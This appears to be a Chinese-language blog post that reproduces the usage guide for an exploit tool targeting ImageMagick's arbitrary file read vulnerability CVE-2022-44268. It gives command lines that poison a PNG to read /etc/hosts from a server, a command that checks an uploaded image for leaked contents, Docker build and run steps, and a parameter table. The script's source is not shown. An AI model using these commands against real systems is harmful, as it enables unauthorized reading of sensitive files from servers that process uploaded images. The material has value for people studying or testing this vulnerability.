ImageMagick 任意文件读取漏洞 CVE-2022-44268 利用指南

本文详细介绍了ImageMagick CVE-2022-44268漏洞的利用方法,包括如何通过恶意PNG图像读取目标系统的敏感文件,以及使用Python脚本和Docker容器进行漏洞验证的具体步骤。

CVE-2022-44268 🧙‍♂️

CVE-2022-44268 ImageMagick 任意文件读取漏洞

用法 🛠

对图像进行投毒 ☣️

1
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
1
上传投毒后的PNG图像。

检查漏洞利用是否成功 🗡

1
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png

通过Docker运行 :whale:

构建

1
docker build -t cve-2022-44268 .

运行

1
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png

参数 🧰

参数 描述 类型
–url 已上传PNG图像的URL 字符串
–image 输入的PNG文件 文件
–output 输出的PNG文件 文件
–file-to-read 从漏洞主机读取的文件 字符串
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计